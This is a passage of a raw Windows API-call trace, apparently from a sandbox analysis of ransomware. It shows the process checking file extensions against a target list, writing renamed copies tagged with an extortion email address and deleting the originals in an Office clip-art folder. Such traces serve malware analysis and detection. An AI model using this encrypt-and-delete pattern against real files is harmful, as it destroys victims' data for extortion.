4 [0197.590] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.591] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.591] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0197.592] GetLastError () returned 0x0 [0197.592] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xd902, lpOverlapped=0x0) returned 1 [0197.616] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xd910, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xd910, lpOverlapped=0x0) returned 1 [0197.617] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.617] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.617] SetEndOfFile (hFile=0x374) returned 1 [0197.618] CloseHandle (hObject=0x374) returned 1 [0197.618] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.618] SetEndOfFile (hFile=0x360) returned 1 [0197.619] CloseHandle (hObject=0x360) returned 1 [0197.619] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.619] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg")) returned 1 [0197.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG") returned 68 [0197.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG") returned 68 [0197.620] lstrlenW (lpString=".doc") returned 4 [0197.620] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.620] lstrlenW (lpString=".docx") returned 5 [0197.620] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1 [0197.620] lstrlenW (lpString=".pdf") returned 4 [0197.620] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.620] lstrlenW (lpString=".xls") returned 4 [0197.620] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.620] lstrlenW (lpString=".xlsx") returned 5 [0197.620] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1 [0197.620] lstrlenW (lpString=".ppt") returned 4 [0197.620] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG") returned 68 [0197.621] lstrlenW (lpString=".zip") returned 4 [0197.621] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.621] lstrlenW (lpString=".rar") returned 4 [0197.621] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.621] lstrlenW (lpString=".bz2") returned 4 [0197.621] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.621] lstrlenW (lpString=".7z") returned 3 [0197.621] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG") returned 68 [0197.621] lstrlenW (lpString=".dbf") returned 4 [0197.621] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG") returned 68 [0197.621] lstrlenW (lpString=".1cd") returned 4 [0197.621] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG") returned 68 [0197.621] lstrlenW (lpString=".jpg") returned 4 [0197.621] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.621] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.622] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0197.630] GetLastError () returned 0x0 [0197.630] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x907d, lpOverlapped=0x0) returned 1 [0197.649] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x9080, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x9080, lpOverlapped=0x0) returned 1 [0197.651] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.651] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.651] SetEndOfFile (hFile=0x374) returned 1 [0197.651] CloseHandle (hObject=0x374) returned 1 [0197.651] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.651] SetEndOfFile (hFile=0x360) returned 1 [0197.652] CloseHandle (hObject=0x360) returned 1 [0197.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.653] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg")) returned 1 [0197.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG") returned 68 [0197.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG") returned 68 [0197.653] lstrlenW (lpString=".doc") returned 4 [0197.653] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.653] lstrlenW (lpString=".docx") returned 5 [0197.653] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0197.653] lstrlenW (lpString=".pdf") returned 4 [0197.653] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.653] lstrlenW (lpString=".xls") returned 4 [0197.658] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.658] lstrlenW (lpString=".xlsx") returned 5 [0197.658] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0197.658] lstrlenW (lpString=".ppt") returned 4 [0197.658] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG") returned 68 [0197.658] lstrlenW (lpString=".zip") returned 4 [0197.658] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.658] lstrlenW (lpString=".rar") returned 4 [0197.658] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.658] lstrlenW (lpString=".bz2") returned 4 [0197.658] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.658] lstrlenW (lpString=".7z") returned 3 [0197.658] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG") returned 68 [0197.658] lstrlenW (lpString=".dbf") returned 4 [0197.658] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG") returned 68 [0197.658] lstrlenW (lpString=".1cd") returned 4 [0197.658] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG") returned 68 [0197.658] lstrlenW (lpString=".jpg") returned 4 [0197.658] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.660] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.660] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0197.661] GetLastError () returned 0x0 [0197.661] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x7214, lpOverlapped=0x0) returned 1 [0197.685] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x7220, lpOverlapped=0x0) returned 1 [0197.687] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.687] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.687] SetEndOfFile (hFile=0x374) returned 1 [0197.687] CloseHandle (hObject=0x374) returned 1 [0197.687] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.687] SetEndOfFile (hFile=0x360) returned 1 [0197.688] CloseHandle (hObject=0x360) returned 1 [0197.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.689] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg")) returned 1 [0197.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG") returned 68 [0197.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG") returned 68 [0197.689] lstrlenW (lpString=".doc") returned 4 [0197.689] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.690] lstrlenW (lpString=".docx") returned 5 [0197.690] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0197.690] lstrlenW (lpString=".pdf") returned 4 [0197.690] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.690] lstrlenW (lpString=".xls") returned 4 [0197.690] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.690] lstrlenW (lpString=".xlsx") returned 5 [0197.690] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0197.690] lstrlenW (lpString=".ppt") returned 4 [0197.690] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG") returned 68 [0197.690] lstrlenW (lpString=".zip") returned 4 [0197.690] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.690] lstrlenW (lpString=".rar") returned 4 [0197.690] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.690] lstrlenW (lpString=".bz2") returned 4 [0197.690] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.690] lstrlenW (lpString=".7z") returned 3 [0197.690] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG") returned 68 [0197.690] lstrlenW (lpString=".dbf") returned 4 [0197.690] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG") returned 68 [0198.071] lstrlenW (lpString=".1cd") returned 4 [0198.071] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0198.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG") returned 68 [0198.071] lstrlenW (lpString=".jpg") returned 4 [0198.071] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0198.071] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.071] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.072] GetLastError () returned 0x0 [0198.072] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x6fd2, lpOverlapped=0x0) returned 1 [0198.075] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x6fe0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x6fe0, lpOverlapped=0x0) returned 1 [0198.076] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.077] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.077] SetEndOfFile (hFile=0x334) returned 1 [0198.077] CloseHandle (hObject=0x334) returned 1 [0198.077] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.077] SetEndOfFile (hFile=0x390) returned 1 [0198.078] CloseHandle (hObject=0x390) returned 1 [0198.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.078] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf")) returned 1 [0198.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF") returned 68 [0198.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF") returned 68 [0198.079] lstrlenW (lpString=".doc") returned 4 [0198.079] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.079] lstrlenW (lpString=".docx") returned 5 [0198.079] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0198.080] lstrlenW (lpString=".pdf") returned 4 [0198.080] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.080] lstrlenW (lpString=".xls") returned 4 [0198.080] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.080] lstrlenW (lpString=".xlsx") returned 5 [0198.080] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0198.080] lstrlenW (lpString=".ppt") returned 4 [0198.080] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF") returned 68 [0198.080] lstrlenW (lpString=".zip") returned 4 [0198.080] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.080] lstrlenW (lpString=".rar") returned 4 [0198.080] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.080] lstrlenW (lpString=".bz2") returned 4 [0198.080] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.080] lstrlenW (lpString=".7z") returned 3 [0198.080] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF") returned 68 [0198.080] lstrlenW (lpString=".dbf") returned 4 [0198.080] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF") returned 68 [0198.080] lstrlenW (lpString=".1cd") returned 4 [0198.080] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF") returned 68 [0198.080] lstrlenW (lpString=".jpg") returned 4 [0198.080] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.081] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.081] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.082] GetLastError () returned 0x0 [0198.082] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x5f6e, lpOverlapped=0x0) returned 1 [0198.084] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x5f70, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x5f70, lpOverlapped=0x0) returned 1 [0198.086] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.086] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.086] SetEndOfFile (hFile=0x334) returned 1 [0198.086] CloseHandle (hObject=0x334) returned 1 [0198.086] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.086] SetEndOfFile (hFile=0x390) returned 1 [0198.087] CloseHandle (hObject=0x390) returned 1 [0198.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.088] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf")) returned 1 [0198.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF") returned 68 [0198.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF") returned 68 [0198.089] lstrlenW (lpString=".doc") returned 4 [0198.089] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.089] lstrlenW (lpString=".docx") returned 5 [0198.089] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0198.089] lstrlenW (lpString=".pdf") returned 4 [0198.089] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.089] lstrlenW (lpString=".xls") returned 4 [0198.089] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.089] lstrlenW (lpString=".xlsx") returned 5 [0198.089] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0198.089] lstrlenW (lpString=".ppt") returned 4 [0198.089] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF") returned 68 [0198.089] lstrlenW (lpString=".zip") returned 4 [0198.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.089] lstrlenW (lpString=".rar") returned 4 [0198.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.089] lstrlenW (lpString=".bz2") returned 4 [0198.089] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.089] lstrlenW (lpString=".7z") returned 3 [0198.089] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF") returned 68 [0198.089] lstrlenW (lpString=".dbf") returned 4 [0198.089] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF") returned 68 [0198.089] lstrlenW (lpString=".1cd") returned 4 [0198.089] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF") returned 68 [0198.090] lstrlenW (lpString=".jpg") returned 4 [0198.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.090] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.090] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.091] GetLastError () returned 0x0 [0198.091] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4b4a, lpOverlapped=0x0) returned 1 [0198.100] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4b50, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4b50, lpOverlapped=0x0) returned 1 [0198.102] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.102] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.102] SetEndOfFile (hFile=0x334) returned 1 [0198.102] 